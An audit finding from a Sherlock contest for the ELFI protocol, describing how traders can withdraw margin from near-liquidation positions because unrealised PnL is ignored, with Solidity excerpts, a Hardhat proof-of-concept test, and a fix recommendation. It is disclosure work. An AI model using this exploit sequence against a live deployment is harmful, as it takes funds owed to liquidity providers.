sherlock-audit / 2024-05-elfi-protocol-judging

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jennifer37 - Traders may decrease the loss via decrease the position's margin #82

Open sherlock-admin2 opened 3 months ago

sherlock-admin2 commented 3 months ago



Traders may decrease the loss via decrease the position's margin


When traders decrease the position's margin, _executeReduceMargin did not consider current Pnl.

Vulnerability Detail

In function updatePositionMargin, we can decrease one isolated position's margin and transfer some margin to users' account. The vulnerability exists in function _executeReduceMargin. Function _executeReduceMargin will calculate maxReduceMarginInUsd. Users' reduceMargin cannot be larger than maxReduceMarginInUsd. The calculation of maxReduceMarginInUsd is initialMarginInUsd - margins for maximum leverage based on current position.

The vulnerability is that the system does not consider the positions' Pnl. If this position is at the edge of liquidation, he may get back a little funds by closing this position. However, the trader can get back more funds via decreasing margin. In below Poc, even if this position is unhealthy and needed to be liquidated and the user cannot close this position, the user can still get part of funds back via decreasing margin.

    function updatePositionMargin(uint256 requestId, UpdatePositionMargin.Request memory request) external {
        Position.Props storage position = Position.load(request.positionKey);
        Symbol.Props memory symbolProps = Symbol.load(position.symbol);
        Account.Props storage accountProps = Account.load(request.account);
        //add margin, transfer from vault to LP Pool
        if (request.isAdd) {
        } else {
            // decrease margin, transfer from LP Pool to the trader.
            uint256 reduceMarginAmount = _executeReduceMargin(position, symbolProps, request.updateMarginAmount, true);
            VaultProcess.transferOut(symbolProps.stakeToken, request.marginToken, request.account, reduceMarginAmount);
            position.emitPositionUpdateEvent(requestId, Position.PositionUpdateFrom.DECREASE_MARGIN, 0);
    function _executeReduceMargin(
        Position.Props storage position,
        Symbol.Props memory symbolProps,
        uint256 reduceMargin,
        bool needUpdateLeverage
    ) internal returns (uint256) {
        AppConfig.SymbolConfig memory symbolConfig = AppConfig.getSymbolConfig(symbolProps.code);
        //calculate minimum margin for max leverage, left margin should not be less than minimum margin
        uint256 maxReduceMarginInUsd = position.initialMarginInUsd -
            CalUtils.divRate(position.qty, symbolConfig.maxLeverage).max(


Add this part into increaseMarketOrder.test.ts.

  it.only('Case2.1: decrease margin to avoid the miss', async function () {
    // Step 1: user0 create one position BTC
    console.log("User0 Long BTC ");
    const orderMargin1 = precision.token(1, 17) // 0.1BTC
    const btcPrice1 = precision.price(50000)
    const btcOracle1 = [{ token: wbtcAddr, minPrice: btcPrice1, maxPrice: btcPrice1 }]
    const executionFee = precision.token(2, 15)

    await handleOrder(fixture, {
      orderMargin: orderMargin1,
      oracle: btcOracle1,
      marginToken: wbtc,
      account: user0,
      symbol: btcUsd,
      executionFee: executionFee,
    // Cannot close this position, because of PositionShouldBeLiquidation
    const btcPrice2 = precision.price(40000)
    const btcOracle2 = [{ token: wbtcAddr, minPrice: btcPrice2, maxPrice: btcPrice2 }]
    let positionInfo = await positionFacet.getSinglePosition(user0.address, btcUsd, wbtcAddr, false)
     const closeQty1 = positionInfo.qty
     await handleOrder(fixture, {
       symbol: btcUsd,
       marginToken: wbtc,
       orderSide: OrderSide.SHORT,
       posSide: PositionSide.DECREASE,
       qty: closeQty1,
       oracle: btcOracle2,
       executionFee: executionFee,

    // Step 2: decrease margin
    console.log("User0 update position")
    // user0 use weth
    let positionInfo = await positionFacet.getSinglePosition(user0.address, btcUsd, wbtcAddr, false)
    let tx = await positionFacet.connect(user0).createUpdatePositionMarginRequest(
        positionKey: positionInfo.key,
        isAdd: false,
        isNativeToken: false,
        marginToken: wbtc,
        updateMarginAmount: precision.token(2462, 18),
        executionFee: executionFee,
        value: executionFee,
    let requestId = await marketFacet.getLastUuid(UPDATE_MARGIN_ID_KEY)
    await tx.wait()
    console.log("Before execute :", await wbtc.balanceOf(user0.address))
    // Step 3: execute user0 update request
    const tokenPrice = precision.price(40000)
    const oracle = [{ token: wbtcAddr, targetToken: ethers.ZeroAddress, minPrice: tokenPrice, maxPrice: tokenPrice }]
    tx = await positionFacet.connect(user3).executeUpdatePositionMarginRequest(requestId, oracle)
    await tx.wait()
    console.log("After execute :", await wbtc.balanceOf(user0.address))



Traders can get back some funds via decreasing one position's margin. LP holders will lose some expected profits.

Code Snippet

Tool used

Manual Review


Consider the unrealised Pnl when we decrease one position's margin.

sherlock-admin2 commented 3 months ago

The protocol team fixed this issue in the following PRs/commits:

sherlock-admin2 commented 2 months ago

The Lead Senior Watson signed off on the fix.